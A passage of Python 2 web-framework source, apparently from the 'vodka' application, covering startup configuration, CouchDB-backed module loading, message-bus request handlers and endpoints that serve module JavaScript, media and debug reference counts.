"js" : "base/js",
"css" : "base/css",
"libs" : "base/libs"
})
self.statusKey = self.config.get("app", {}).get("status_key", None)
# set up version based dispatch
pathCfg = self.config.get("path", {})
for path, dest in pathCfg.items():
webapp.url_map.append(["/%s%s" % (version, path), dest])
self.debugging = (self.config.get("app", {}).get("debugging", "no") == "yes")
# set up profiling
profile_conf = self.config.get("profiler", {})
if profile_conf.get("enabled") == "yes":
self.profiling = True
self.profiling_path = profile_conf.get(
"output.path",
os.path.join(
os.path.dirname(__file__),
"profile",
"%s.profile" % ("%s."+str(int(time.time())))
)
)
else:
self.profiling = False
self.profiling_path = None
if profile_conf.get("wsgi") == "yes":
self.profiling_wsgi = True
else:
self.profiling_wsgi = False
# set up logging
log = webapp.log
if is_production() or int(self.config.get("server",{}).get("syslog",0)):
syslog_address = self.config.get("server", {}).get("syslog_address", "/dev/log")
syslog_facility = self.config.get("server", {}).get("syslog_facility", "LOG_LOCAL0")
print "Using syslog to log error messages (address:%s) (facility:%s)" % (syslog_address, syslog_facility)
hdl = UTFFixedSysLogHandler(address=syslog_address, facility=getattr(logging.handlers.SysLogHandler, syslog_facility))
hdl.setFormatter(logging.Formatter(" Vodka %(message)s"))
else:
hdl = logging.FileHandler("error.log")
hdl.setFormatter(logging.Formatter("%(asctime)s - vodka %(message)s"))
log.addHandler(hdl)
self.log = log
try:
# load grant permissions list from config
self.grant_permissions = self.config.get("grant_permissions", {})
for name, perms in self.grant_permissions.items():
t = perms
p = 0
if "r" in t:
p |= 0x01
if "w" in t:
p |= 0x02
if "x" in t:
p |= 0x04
self.grant_permissions[name] = p
self.info("GRANTING EVERYONE PERMISSION to %s at level %d" % (name, p))
# load brand and theme map from dispatch
self.load_dispatch()
# connect database client
self.couch_engine = serverConf.get("couch_engine", "couchdb")
self.couch_config = self.config.get(self.couch_engine, {})
self.info("Using database: %s" % self.couch_engine)
if not self.couch_config:
raise Exception("Attempted to use couch-engine: %s for preferences, but found no config section for it" % couch_engine)
design_path = os.path.join(os.path.dirname(inspect.getfile(twentyc.vodka)), "data", "design")
self.info("Making sure designs are up to date, reading from %s ..." % design_path)
for design_file in os.listdir(design_path):
twentyc.database.tools.update_views(
self.couch_engine,
self.couch_config,
os.path.join(design_path, design_file)
)
self.db_prefs = twentyc.database.ClientFromConfig(
self.couch_engine,
self.couch_config,
"prefs",
logger=self.log
)
pref_limits = self.config.get("pref_limits", {})
if not pref_limits.has_key("color_theme"):
raise Exception("Missing pref limit for color themes, add in section [pref_limits], color_theme : n")
if not pref_limits.has_key("layout"):
raise Exception("Missing pref limit for layout, add in section [pref_limits], layout : n")
for doctype, limit in pref_limits.items():
prefs.document_limits[doctype] = int(limit)
# connect vodka module manager
self.module_manager = twentyc.vodka.tools.module_manager.ModuleManager(
logger=self.log
)
self.db_modules = twentyc.database.ClientFromConfig(
self.couch_engine,
self.couch_config,
"modules",
logger=self.log
)
self.module_manager.set_database(self.db_modules)
# stores module data for easy access,
# version, status, mobile, dependencies and whether the
# were loaded from disk or database
self.module_status = {}
self.module_status_time = 0
self.module_js_load_order = module_js_load_order
self.module_py_load_order = module_py_load_order
# load modules from disk
self.load_modules_from_disk()
# load modules from database.
self.load_modules()
self.update_modules()
if self.config.get("module_load_order"):
load_order = self.config.get("module_load_order",{})
self.module_js_load_order = sorted(self.module_js_load_order, key=lambda obj:load_order.get(obj, "99"))
# load unload tools js and store it
f = open("htdocs/js/twentyc.unloadtools.js", "r")
self.unload_tools_code = f.read()
f.close()
# extend from modules if needed
self.modules = module_py_components
if module_py_components:
for name in module_py_load_order:
mod = module_py_components.get(name)
if hasattr(mod, 'extend_vodka'):
self.info("%s is extending application" % name)
mod.extend_vodka(self, VodkaApp);
# bind rpc
from rpc import RPC
self.rpc_json = RPC(RPC_OUTPUT_JSON, self)
self.rpc_json.exposed = True
self.rpc_static = RPC(RPC_OUTPUT_STATIC, self)
self.rpc_static.exposed = True
# connect xbahn
self.storage = {}
self.xbahn = None
if xbahn:
xbahn_connect = VodkaAppThread(self.connect_xbahn)
xbahn_connect.start()
# connect client pool
self.client_pool = ClientPool(
int(self.config.get("app", {}).get("client_pool.size", 20)),
self
)
# tasks will be stored here
self.tasks = {}
self.taskCleanupMargin = int(self.config.get("tasks", {}).get("cleanup_margin", TASK_CLEANUP_MARGIN))
self.taskTimeoutMargin = int(self.config.get("tasks", {}).get("timeout_margin", TASK_TIMEOUT_MARGIN))
self.taskSilenceMargin = int(self.config.get("tasks", {}).get("silence_margin", TASK_SILENCE_MARGIN))
self.taskSessionCap = int(self.config.get("tasks", {}).get("session_cap", TASK_SESSION_CAP))
task_cleanup = VodkaAppThread(self.task_cleanup_worker)
task_cleanup.start()
self.lib_includes_js = self.config.get("includes",{}).get("js","")
if self.lib_includes_js:
if type(self.lib_includes_js) == str:
self.lib_includes_js = self.lib_includes_js.split(",")
else:
self.lib_includes_js = []
# make sure core lib is always loaded (it's tiny)
if "base/js/twentyc.core.js" not in self.lib_includes_js:
self.lib_includes_js.insert(0, os.path.join(self.locationConfig.get("js"), "twentyc.core.js"))
self.lib_includes_css = self.config.get("includes",{}).get("css","")
if self.lib_includes_css:
if type(self.lib_includes_css) == str:
self.lib_includes_css = self.lib_includes_css.split(",")
else:
self.lib_includes_css = []
self.info("%d templates initialized" % (len(self.templates.keys())))
self.info("Running on vodka %s (instance id: %s from %s)" % (version, self.id, socket.gethostname()))
self.start()
except Exception, inst:
self.log.debug(str(inst)+"\n"+traceback.format_exc())
raise
#############################################################################
def start(self):
self.app_status = 1
t_run = VodkaAppThread(self.run)
t_run.start()
#############################################################################
def run(self):
while self.app_status == 1:
self.update_modules();
time.sleep(1)
#############################################################################
def stop(self):
self.app_status = 10
self.logout_all_sessions()
self.tasks_terminate()
if self.xbahn:
self.xbahn.stop()
#############################################################################
def connect_db(self, id):
setattr(self, "%s_db" % id, twentyc.database.ClientFromConfig(
self.couch_engine,
self.config.get(id),
id,
logger=self.log
))
#############################################################################
def connect_xbahn(self):
xbahn_config = self.config.get("xbahn")
if xbahn_config and xbahn:
self.xbahn = xbahn.xBahnThread(
xbahn_config.get("host"),
xbahn_config.get("port"),
xbahn_config.get("exchange"),
self,
self.storage,
username = xbahn_config.get("username"),
password = xbahn_config.get("password"),
queue_name = xbahn_config.get("queue_id","vodka"),
queue_capacity = int(xbahn_config.get("queue_capacity", 50)),
log=self.log
)
self.xbahn.start()
self.module_manager.xbahn_set(self.xbahn)
self.xbahn.set_limits(self.config.get("xbahn_limits",{}))
self.xbahn.listen("__U.*.notify")
# set up required topics
tpc_vodka_ctrl = self.xbahn.listen("__vodka.control.*")
if tpc_vodka_ctrl:
tpc_vodka_ctrl.callbacks.append(self.vodka_control_handler)
tpc_vodka_xb_req = self.xbahn.listen("__vodka.%s.request" % self.id)
if tpc_vodka_xb_req:
tpc_vodka_xb_req.callbacks.append(self.vodka_xbahn_request_handler)
tpc_vodka_xb_req = self.xbahn.listen("__vodka.ALL.request")
if tpc_vodka_xb_req:
tpc_vodka_xb_req.callbacks.append(self.vodka_xbahn_request_handler)
tpc_task_info = self.xbahn.listen("__vodka-task-update.%s.*" % self.id)
tpc_task_info.config.update(
{
"storage_handler" : self.task_update_receiver
}
)
self.info("Cleaning up any previous tasks that may still be lingering around")
self.xbahn.send(None, "__vodka-task-ctrl.%s._ALL_" % self.id, {
"cmd" : "stop"
})
# see if any of the loaded mods need to init something
# on xbahn
if module_py_components:
for name in module_py_load_order:
mod = module_py_components.get(name)
if hasattr(mod, 'xbahn_init'):
self.info("%s is hooking into xbahn" % name)
mod.xbahn_init(self, self.xbahn);
else:
self.xbahn = None
#############################################################################
def vodka_xbahn_request_handler(self, msg, data):
cmd = data.get("cmd")
print "Got XBAHN request: %s" % data
try:
if cmd == "request.ping":
self.xbahn.respond(msg,
{
"result" : {
"id" : self.id,
"pid" : os.getpid(),
"host" : uwsgi.opt.get("socket"),
"xbahn" : self.xbahn.conn_str
}
}
)
elif cmd == "request.status":
self.xbahn.respond(msg, {
"result" : self.status_json()
})
else:
kwargs = data.get('kwargs',{})
type = kwargs.get('type')
if type:
cmd = "%s_%s" % (cmd, type)
if not hasattr(self, cmd):
raise Exception("Unknown command: %s" % cmd)
fn = getattr(self, cmd)
if not fn.xrh_exposed:
raise Exception("Command %s is not exposed to the xbahn request handler")
rdata = { "result" : fn(**kwargs) }
self.xbahn.respond(msg, rdata);
except Exception, inst:
self.xbahn.respond(msg, { "status" : "ERR", "alert" : "Vodka Threw Exception(%s): %s" % (inst.__class__.__name__, str(inst))})
webapp.log.error(traceback.format_exc())
#############################################################################
def vodka_control_handler(self, msg, data):
if msg.subject == "__vodka.control.require_session_map":
# something requires a full update of the session mapping
self.xbahn.send(
None, "__vodka.update.session_map", self.session_map
)
elif msg.subject == "__vodka.control.reload_modules_for_client":
self.client_reload_modules(
data.get("user_id"),
data.get("modules")
)
elif msg.subject == "__vodka.control.unload_modules_for_client":
self.client_unoad_modules(
data.get("user_id"),
data.get("modules")
)
#############################################################################
def client_reload_modules(self, user_id, modules):
sessions = self.sessions_by_user_id(user_id)
for ses in sessions:
if modules:
old_perms = ses.module_perms
ses.reload_20c_module_perms()
for mod, perms in modules.items():
if ses.check_20c_module(mod) and not self.module_manager.perms_check(old_perms, mod):
self.log.info("User %s gained access to module %s" % (user_id, mod))
ses.rce_require(
"reload.%s" % mod,
"\n".join([
"TwentyC.Modules.Load('%s', '%s');" % (mod, self.module_version(mod))
])
)
else:
old_perms = ses.module_perms
ses.reload_20c_module_perms()
modules = self.update_modules()
for mod, info in modules.items():
if info.get("access_level", 0) == 0:
continue
if not self.module_manager.perms_check(old_perms, mod):
if ses.check_20c_module(mod):
self.log.info("User %s gained access to module %s" % (user_id, mod))
ses.reload_20c_module(mod, self.module_version(mod))
elif not ses.check_20c_module(mod):
self.log.info("User %s lost access to module %s" % (user_id, mod))
ses.unload_20c_module(mod)
ses.rce_require("reload_perms_to_client", "TwentyC.Modules.LoadModulePerms();")
#############################################################################
def client_unload_modules(self, user_id, modules):
sessions = self.sessions_by_user_id(user_id)
for ses in sessions:
ses.reload_20c_module_perms()
for mod, perms in modules.items():
if not ses.check_20c_module(mod):
self.log.info("User %s lost access to module %s" % (user_id, mod))
ses.unload_20c_module(mod)
ses.rce_require("reload_perms_to_client", "TwentyC.Modules.LoadModulePerms();")
#############################################################################
def sessions_by_user_id(self, user_id):
try:
rv = []
for sid, ses in webapp.sessionCache.items():
cl_ses = ses.data.get("client_session")
if cl_ses and cl_ses.auth_id == user_id:
rv.append(cl_ses)
return rv
except Exception, inst:
self.log_error(inst)
#############################################################################
def log_error(err):
self.log.error(str(err))
self.log.error(traceback.format_exc())
#############################################################################
def dbg(self, msg):
msg = "Vodka: %s" % msg
print msg
self.log.debug(msg)
#############################################################################
def info(self, msg):
msg = "Vodka: %s" % msg
print msg
self.log.info(msg)
#############################################################################
def module_version(self, name):
#if not is_production():
# return time.time()
return self.update_modules().get(name, {}).get("version", version)
#############################################################################
def list_modules(self):
return self.module_js_load_order
#############################################################################
def modules_at_path(self, dir):
"""
returns a list of valid vodka modules that exist at path"
"""
rv = {}
for mod in os.listdir(dir):
if mod[0] in [".","_"] or mod in ["config"]:
continue
path = os.path.join(dir,mod)
if not os.path.isdir(path):
continue
rv[mod] = path
return rv
#############################################################################
def is_module_loaded(self, modid):
"""
Returns whether the specified module has been loaded from any source
"""
return self.module_status.get(modid,{}).get("source")
#############################################################################
def load_modules_from_disk(self):
# see what directories to scan for modules
dirs = self.config.get("module_directories", {})
all_instructions = {}
# preload module instructions for all module sources specified in the config
for name, dir in dirs.items():
# read module instructions
instructions_path = os.path.join(dir, "vodka_import.json")
if not os.path.exists(dir):
self.info("Specified module directory for '%s': %s DOES NOT EXIT" %(name,dir))
continue
if not os.path.exists(instructions_path):
self.info("No module instructions found for %s, skipping" % dir)
continue
f = open(instructions_path, "r")
instructions = jsonlib.loads(f.read())
f.close()
# make sure a module name space is defined in the instructions
namespace = instructions.get("namespace")
if not namespace:
self.info("No module namespace defined in %s, skipping" % instructions_path)
continue
all_instructions[name] = instructions
for mod, path in self.modules_at_path(dir).items():
self.module_status["%s.%s" % (namespace, mod)] = {
"path" : path
}
self.disk_module_instructions = all_instructions
# load modules from all directory sources specified in the config
for name, dir in dirs.items():
# only proceed if there are module instructions in the directory
instructions = all_instructions.get(name)
if not instructions:
continue
namespace = instructions.get("namespace")
# require global module dependencies specified in the instructions
# if any
if instructions.get("_dependencies"):
for dep in instructions.get("_dependencies"):
self.load_module_dependency(dep, "%s modules" % namespace)
# cycle through directories in the source location, and load
# any valid vodka module we find
for mod, path in self.modules_at_path(dir).items():
mod_id = "%s.%s" % (namespace, mod)
# load the module from the disk
if os.path.isdir(path):
self.load_module_from_disk(mod_id, path, instructions)
#############################################################################
def load_module_dependency(self, mod_id, reason=""):
# if module is already loaded from elsewhere, bail
if self.is_module_loaded(mod_id):
return
path = self.module_status.get(mod_id, {}).get("path")
if path:
# module is loaded from disk
if not self.is_module_loaded(mod_id):
self.info("Loading dependency from disk: %s from %s for %s" % (mod_id, path, reason))
self.load_module_from_disk(
mod_id,
path,
self.disk_module_instructions.get(mod_id.split(".")[0])
)
else:
# module is loaded from database
rv = self.load_module(mod_id)
if not rv:
raise Exception("Could NOT load module dependency: %s for %s" % (mod_id, reason))
else:
self.info("Loading dependency from couchdb: %s for %s" % (mod_id, reason))
#############################################################################
def load_module_from_disk(self, mod_id, path, instructions):
"""
Load the specified module from disk
"""
# if module is already loaded from elsewhere, bail
if self.is_module_loaded(mod_id):
return
a = mod_id.split(".")
namespace = a[0]
mod = ".".join(a[1:])
# get loading instructions for module
mod_instructions = instructions.get(mod, {})
# dependencies of this module
dep = mod_instructions.get("dependencies",[])
# dont load the module if its disabled via config
if self.mcfg.get(mod_id) == "disabled" or self.mcfg.get(namespace) == "disabled":
return
# load dependency modules
if dep:
for d in dep:
self.load_module_dependency(d, mod_id)
js = ""
namespace = mod_id.split(".")[0]
has_js = False
if os.path.isdir(path):
self.info("Loading module from directory: %s, %s" % (mod_id,path))
# add module to module status
self.module_status[mod_id] = {
"version" : instructions.get("version", version),
"access_level" : int(mod_instructions.get("access_level", 0)),
"dependencies" : dep,
"status" : 1,
"source" : "disk",
"path" : path,
"mobile" : mod_instructions.get("mobile",False)
}
# load preferences validators for this module
if os.path.exists(os.path.join(path, "prefs.json")):
validator.add_from_file(os.path.join(path,"prefs.json"))
# load template components of this module
if os.path.exists(os.path.join(path, "tmpl")):
tmpl_path = os.path.join(path, "tmpl")
for file in os.listdir(tmpl_path):
if file[0] == ".":
continue
tmpl_file_path = os.path.join(tmpl_path, file)
if os.path.isdir(tmpl_file_path):
# themed template
for t_file in os.listdir(tmpl_file_path):
if t_file[0] == ".":
continue
self.templates["%s.%s.%s" % (mod_id,file,t_file)] = [os.path.join(tmpl_file_path, t_file), "r"]
else:
# themeless template
self.templates["%s.%s" % (mod_id, file)] = [tmpl_file_path, "r"]
# load python components of this module
for file in os.listdir(path):
if re.match(".*\.py$", file) and file not in ["__init__.py"]:
mod_path = os.path.join(path, file)
f = open(mod_path, "r")
code = f.read()
f.close()
mod_sysid = re.sub("[^a-zA-Z0-9_]","_",mod_id)
pymod = imp.new_module(mod_sysid)
sys.modules[mod_sysid] = pymod
exec code in pymod.__dict__
module_py_components[mod_id] = pymod
module_py_load_order.append(mod_id)
elif re.match(".*\.js$", file) and not re.match("^_min_\.", file) and not file in twentyc.vodka.tools.module_manager.javascript_parts:
self.module_status[mod_id]["path_js"] = os.path.join(path, file)
has_js = True
if has_js:
module_js_load_order.append(mod_id)
#############################################################################
def load_modules(self):
"""
Load modules using the vodka module manager connected to a database
(database, couchdb)
"""
t1 = time.time()
if self.module_manager:
man = self.module_manager
try:
modules = man.module_index().get("modules")
except Exception,inst:
self.info("!!!!!!! Did you forget to run cli/update_design.py after your last vodka update?")
raise
for name, data in modules.items():
if self.mcfg.get(name) != "disabled":
self.load_module(name)
print "Modules loaded from database in %.5f" % (time.time() - t1)
#############################################################################
def load_module(self, name):
"""
load the specified vodka module using the module manager
"""
if not self.module_manager:
return
mod_id = name
man = self.module_manager
a = name.split(".")
namespace = a[0]
mod_name = ".".join(a[1:])
# if module namespace is disabled in config, bail
if self.mcfg.get(namespace) == "disabled" or self.mcfg.get(mod_id) == "disabled":
return
info = man.module_info(namespace, mod_name)
if info:
# if module has already been loaded from disk, give priority to that
# and skip this.
if self.is_module_loaded(name):
return True
# if module has dependencies, load those first - assuming they havent been loaded yet
if info.get("dependencies"):
for dependency in info.get("dependencies"):
self.load_module_dependency(dependency, name)
# if not self.is_module_loaded(dependency):
# print "Dependency for %s: %s" % (name, dependency)
# self.load_module(dependency)
self.info("Loading module from %s: %s" % (self.couch_engine, name))
# make entry in module_status
self.module_status[mod_id] = {
"version" : info.get("version"),
"access_level" : int(info.get("access_level", 0)),
"dependencies" : info.get("dependencies", []),
"source" : "manager",
"status" : info.get("status"),
"path" : None,
"mobile" : info.get("mobile", False)
}
# module info is loaded, import any module components of it
imports = man.module_import(namespace, mod_name)
for comp_name,mod in imports.items():
mod._module_from_database = name
module_py_components["%s.%s"%(name, comp_name)] = mod
module_py_load_order.append("%s.%s"%(name, comp_name))
# load templates
self.templates.update(man.module_templates(namespace, mod_name))
# load validator json for this module
validator_code = man.module_validator_code(namespace, mod_name)
if validator_code:
validator.add_from_json(validator_code)
module_js_load_order.append(mod_id)
return True
else:
self.info("No valid module data found for %s, skipping" % name)
return False
#############################################################################
# load brands from dipatch.conf
def load_dispatch(self):
"""
load dispatch config (brands, locale etc) so they can later
be picked by the sessions
"""
# load dispatch config
config = self.config
self.brand = {}
self._brand_map = {}
self._locale = {}
self._theme_map = {}
# load default brand
self.brand["default"] = dict(config.get("brand.default"))
self.brand["default"]["locale"] = self.get_locale(self.brand["default"]["lang"])
self.brand["default"]["name"] = "default"
def init_brand(brand):
section = "brand." + brand
bd = dict(self.brand["default"])
if config.has_key(section):
print "loading " + section
for k,v in config.get(section).items():
bd[k] = v
bd["locations"] = config.get(section).get("locations","")
if bd["locations"]:
bd["locations"] = bd["locations"].split(",")
if not os.path.isdir(bd["dir"]):
raise Exception("Brand directory not found: %s (absolute path required)" % bd["dir"])
bd["name"] = brand
bd["locale"] = self.get_locale(bd["lang"])
webapp.url_map.append(
("/%s-favicon.ico" % brand, "%s/htdocs/favicon.ico" % bd["dir"]),
)
webapp.url_map.append(
("/%s/brands/%s" % (version, brand), "%s/htdocs" % bd["dir"], "%s/htdocs" % self.brand["default"].get("dir"))
)
return bd
init_brand("default")
for brand,regex in config.get("brand_map").items():
self._brand_map[brand] = re.compile(regex)
self.brand[brand] = init_brand(brand)
#for k,v in self.brand.items():
# print "FF " + k + " : " + str(v)
for name, regex in config.get("theme_map").items():
self._theme_map[name] = re.compile(regex)
#############################################################################
def prepare_request(self, request, environ):
"""
prepare request
unline handle request this is fired before path dipatch
"""
ses = self.get_session(request)
#############################################################################
# handle request
def handle_request(self, request, environ):
"""
handle incoming http request
sets the request property of the user's session
"""
ses = self.get_session(request)
csrf = webapp.get_cookie(request, "csrftoken");
if not csrf:
secure = (self.config.get("session").get("cookie_secure", "no") == "yes")
csrfCookie = SimpleCookie()
csrfCookie['csrftoken'] = str(webapp.uuid.uuid4()).replace('-', '')
csrfCookie['csrftoken']['path'] = "/"
if secure:
csrfCookie['csrftoken']['secure'] = True
request['cookies_out']["csrftoken"] = csrfCookie;
self.http_requests += 1
self.http_requests_total += 1
############################################################################
# clean up request
def cleanup_request(self, request, environ):
return
#############################################################################
# get session object
def get_session(self, request):
"""
Return the session object for the user the request
"""
sesContainer = request.get("session")
#print "Using session " + str(sesContainer.id)
if not sesContainer.data.has_key("client_session"):
sesContainer.data["client_session"] = session.Session(self, request, sesContainer.id)
return weakref.proxy(sesContainer.data.get("client_session"))
##############################################################################
def template_response(self, name, **kwargs):
req = kwargs.get("__request")
ses = self.get_session(req)
return ses.tmpl(name, request=req, **kwargs)
##############################################################################
def extend(self, name, method):
setattr(self, name, new.instancemethod(method, self, VodkaApp))
##############################################################################
def get_locale(self, lang):
# ref locale objects
if lang not in self._locale:
self._locale[lang] = locale.Locale(lang)
self._locale[lang].htmlescape()
return self._locale[lang]
##############################################################################
def authed_session(self, request):
"""
check if the request holds an authenticated session object
Return session object on success else
raise a HTTPRedirect to the login page
"""
ses = self.get_session(request)
if ses.is_authed():
return ses
##############################################################################
def update_modules(self):
now = time.time()
if not self.module_status_time or now-self.module_status_time > 10:
self.module_status_time = now
s = self.module_manager.module_index()
# module manager returned empty module list, bail
# before bailing unload all old modules that had been
# loaded from manager before
if not s:
for i, mod in self.module_status.items():
if mod.get("source") == "manager":
del self.module_status[i]
return self.module_status
for k, mod in s.get("modules").items():
if self.is_module_loaded(k):
old = self.module_status.get(k)
# check if module is loaded from disk already, if it is, bail
if old.get("source") == "disk":
continue
# mod has already been loaded into vodka, but a new version is available
if old.get("version") != mod.get("version") or old.get("status") != mod.get("status"):
self.info("Mod version or status change for '%s' : %s" % (k, mod.get("version")))
modstat = {
"version" : mod.get("version"),
"mobile" : mod.get("mobile", 0),
"status" : mod.get("status"),
"dependencies" : mod.get("dependencies", []),
"source" : "manager",
"access_level" : mod.get("access_level", 0),
"path" : None
}
# load validator json for this module
validator_code = self.module_manager.module_validator_code(mod.get("namespace"), mod.get("name"))
if validator_code:
validator.add_from_json(validator_code)
self.module_status[k] = modstat
# reload templates
self.templates.update(self.module_manager.module_templates(mod.get("namespace"), mod.get("name")))
else:
# mod has not beenm loaded into vodka yet, load it.
# if module namespace is disabled in config, bail
if self.mcfg.get(mod.get("namespace")) == "disabled":
continue
# if module is disabled
if self.mcfg.get(k) == "disabled":
continue
# if module not approved yet
if not mod.get("status"):
continue
self.info("New vodka mod discovered: %s, loading ..." % k)
self.load_module(k)
# finally find any modules that have been removed
for k, mod in self.module_status.items():
if not mod.get("source") == "manager":
continue
if not s.get("modules").get(k):
self.info("Module %s has been removed from database, unloading" % k)
del self.module_status[k]
return self.module_status
#############################################################################
def clear_headers(self, request, keys):
headers = request.get("headers")
i = 0
l = len(headers)
while i < l:
header = headers[i][0]
if header.lower() in keys:
headers.remove(headers[i])
i = 0
l = len(headers)
continue
i += 1
#############################################################################
@webapp.expose
def module_media(self, mod_name, version, file, **kwargs):
req = kwargs.get("__request")
environ = kwargs.get("__environ")
ses = self.get_session(req)
if not self.module_manager:
return ""
man = self.module_manager
if not re.match("^appstore.", file):
if not ses.check_20c_module(mod_name) & ACCESS_READ:
return "";
if not self.is_module_loaded(mod_name):
raise webapp.HTTPError(404)
full_name = mod_name
mod_name = mod_name.split(".")
namespace = mod_name[0]
name = ".".join(mod_name[1:])
info = man.module_info(namespace, name)
modstat = self.module_status.get(full_name)
maxAge = 36000
fromDisk = False
if not info or modstat.get("path_js"):
path = modstat.get("path_js")
path = os.path.dirname(path)
path = os.path.join(path, "media", file);
if path and os.path.exists(path):
self.clear_headers(req, ["pragma","cache-control","content-type"])
mtime = webapp.formatdate(os.path.getmtime(path))
fromDisk = True
else:
raise webapp.HTTPError(404)
else:
self.clear_headers(req, ["pragma","cache-control","content-type"])
mtime = webapp.formatdate(info.get("modified"))
headers = req.get("headers")
cacheHeaders = [
("Pragma", "cache"),
("Cache-Control", "max-age=%d, must-revalidate" % maxAge)
]
#check if file has been modified and send cache response
#if possible
if environ.get('HTTP_IF_MODIFIED_SINCE') == mtime:
headers.extend(cacheHeaders)
req["status"] = 304
return ""
headers.append(("Last-Modified", mtime))
mime = "text/plain"
if not fromDisk:
contents = man.module_media_content(namespace,name, file);
comp = man.module_component(namespace,name, file)
mime = str(comp.get("mime")[0])
elif path:
f = open(path, "r")
contents = f.read()
f.close()
mime = mimetypes.guess_type(path)[0]
headers.extend([
("content-type", mime)
])
return contents
#############################################################################
def module_javascript_component(self, mod_name, comp="unload.js"):
"""
Return a module's javascript component that isnt part of the
module main javascript, such as the module unload script
"""
if not self.is_module_loaded(mod_name):
return
modstat = self.module_status.get(mod_name)
if modstat.get("path_js"):
# from disk
path = os.path.join(
os.path.dirname(modstat.get("path_js")),
comp
)
if not os.path.exists(path):
return ""
f = open(path, "r")
code = f.read()
f.close()
return code
else:
# from cb
man = self.module_manager
namespace, name = man.module_token(mod_name)
minified = self.config.get("modules",{}).get("minified")
if (is_production() and minified != "no") or minified == "yes":
minified = True
else:
minified = False
scr = man.module_component(namespace, name, comp)
if scr:
if minified:
return scr.get("minified")
else:
return scr.get("contents")
return ""
#############################################################################
# return code for remote code execution
# this data wont be cached ever
# RCE is currently primarily used to unload modules on the client side
# after the client no longer has access to them (perms revoked)
@webapp.expose
def rce(self, rce_name, **kwargs):
req = kwargs.get("__request")
environ = kwargs.get("__environ")
ses = self.get_session(req)
# make sure RCE actually exists on session before proceeding
if not ses.rce.has_key(rce_name):
return
rce = ses.rce.get(rce_name)
# prepare code
code = "\n".join([
"(function(){",
"TwentyC.IO.Send(TwentyC.rpcUrl+'/rce_satisfy', {name : '%s', id:'%s'},0,0,0,'POST');" % (rce_name, rce.get("id")),
rce.get("code"),
"})();"
])
headers = req.get("headers")
headers.extend([
("content-type", "text/javascript")
])
# send code
return code
#############################################################################
# load module javascript
@webapp.expose
def ui_component(self, mod_name, version, **kwargs):
req = kwargs.get("__request")
environ = kwargs.get("__environ")
ses = self.get_session(req)
if not self.module_manager:
return ""
if not self.is_module_loaded(mod_name):
raise webapp.HTTPError(404)
man = self.module_manager
if not ses.check_20c_module(mod_name) & ACCESS_READ:
raise webapp.HTTPError(401)
full_mod_name = mod_name
mod_name = mod_name.split(".")
namespace = mod_name[0]
name = ".".join(mod_name[1:])
info = man.module_info(namespace, name)
modstat = self.module_status.get(full_mod_name)
maxAge = 36000
path = None
minified = self.config.get("modules",{}).get("minified")
if (is_production() and minified != "no") or minified == "yes":
minified = True
else:
minified = False
fromDisk = False
if info and info.get("status") == 0:
return "// Module is currently deactivated"
if not info or modstat.get("path_js"):
path = modstat.get("path_js")
if minified:
bname = os.path.basename(path)
dname = os.path.dirname(path)
path = os.path.join(dname, "_min_.%s" % bname)
if path and os.path.exists(path):
self.clear_headers(req, ["pragma","cache-control","content-type"])
mtime = webapp.formatdate(os.path.getmtime(path))
fromDisk = True
else:
raise webapp.HTTPError(404)
else:
self.clear_headers(req, ["pragma","cache-control","content-type"])
mtime = webapp.formatdate(info.get("modified"))
headers = req.get("headers")
headers.extend([
("content-type", "text/javascript")
])
cacheHeaders = [
("Pragma", "cache"),
("Cache-Control", "max-age=%d, must-revalidate" % maxAge)
]
#check if file has been modified and send cache response
#if possible
if environ.get('HTTP_IF_MODIFIED_SINCE') == mtime:
headers.extend(cacheHeaders)
req["status"] = 304
return ""
headers.append(("Last-Modified", mtime))
code = "(function() {\n"
code += "var __MODULE_VERSION='%s';\n" % self.module_version(full_mod_name)
code += "var __MODULE_NAME='%s';\n" % full_mod_name
if not fromDisk:
code += man.module_javascript(namespace,name,minified=minified)
elif path:
f = open(path, "r")
code += f.read()
f.close()
code += "\nTwentyC.Modules.loaded['%s.%s'] = { version : '%s' };" % (namespace,name,version)
code += "\n})()"
return code
#############################################################################
# path: /dbg_refcount
@webapp.expose
def dbg_refcounts(self, **kwargs):
"""
return serialized representation of objects and their refcounts
"""
req = kwargs.get("__request");
if self.statusKey not in kwargs:
raise webapp.HTTPError(404)
if not "ses" in kwargs:
d = {}
sys.modules
# collect all classes
for m in sys.modules.values():
for sym in dir(m):
o = getattr (m, sym)
if type(o) is types.ClassType:
d[o] = sys.getrefcount (o)
# sort by refcount
pairs = map (lambda x: (x[1],x[0]), d.items())
pairs.sort()
pairs.reverse()
return str(pairs)
else:
import gc
ses = webapp.sessionCache[kwargs.get("__request").get("session").id];
r = "Reference count for this session object: %d\n\n" % sys.getrefcount(ses)
r += self.dbg_refs(ses, [], max=int(kwargs.get("max",1)), show_frame=kwargs.get("show_frame"))
gc.collect()
return r
def dbg_refs(self, obj, n, max=3, show_frame=None):
import gc
r = ""
i = 0
if len(n) > max:
return ""
refs = gc.get_referrers(obj)
for ref in refs:
if i > 5:
break
if ref == obj:
continue
if str(type(ref)) == "<type 'frame'>" and not show_frame:
continue
i+=1
r += "".center(len(n),"\t")+"%s\n" % (type(ref))
n.append(1)
r += self.dbg_refs(ref, n, max)
n.pop()
return r
##############################################################################
# play custom uploaded sound
@webapp.expose
def playsound(self, **kwargs):
"""
Send a soundfile response
"""
req = kwargs.get("__request")
ses = self.authed_session(req)
sound = kwargs.get('sound')
if sound:
customSounds = ses.pref_manager.get("sounds")
if customSounds.get(sound):
headers = req.get("headers")
headers.extend([
("content-type", "audio/mpeg")
])
return base64.b64decode(customSounds.get(sound))
else:
sounds = ses.app.config.get("sounds",{})
if sounds.get(sound):
raise webapp.HTTPRedirect("/base/sound/"+sounds.get(sound).strip("'"))
else:
raise Exception("Invalid sound id")
else:
raise Exception("No Sound Specified")
#############################################################################
@webapp.expose
def index(self, **kwargs):
ses = self.get_session(kwargs.get("__request"))
return ses.tmpl("index.tmpl", request=kwargs.get("__request"))
#############################################################################
def status_json(self):
return {
"app_status" : self.app_status,
"status" : "OK"
}
#############################################################################
@bartender.expose
def toggle_profile_requests(self, **kwargs):
if kwargs.get("state") == "on":
self.profiling_wsgi = True
else:
self.profiling_wsgi = False
application.profile = self.profiling_wsgi
webapp.WSGI_PROFILING = self.profiling_wsgi
return { "state" : self.profiling_wsgi }
#############################################################################
@bartender.expose
def profile_json_requests(self, **kwargs):
rv = {}
if self.profiling_wsgi:
rv = { "overview" : [], "recent" : []}
#overview
overview = rv["overview"]
lst = webapp.profile.get("overview").items()
lst = sorted(lst, key=lambda p: p[1].get("num"), reverse=True)
for path, profile in lst:
